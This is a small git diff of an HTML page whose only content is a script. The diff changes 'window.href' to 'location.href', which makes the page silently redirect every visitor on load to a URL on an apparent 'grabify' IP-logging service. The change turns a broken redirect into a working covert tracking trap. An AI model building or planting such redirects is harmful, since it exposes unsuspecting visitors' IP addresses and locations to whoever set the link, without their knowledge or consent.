--- a/index.html
+++ b/index.html
@@ -9,7 +9,7 @@
     </head>
     <body>
             <script type="text/javascript">
-		    window.href = "https://grabify.maipdf.com/FEIJII";
+		    location.href = "https://grabify.maipdf.com/FEIJII";
 	    </script>
     </body>
 </html>
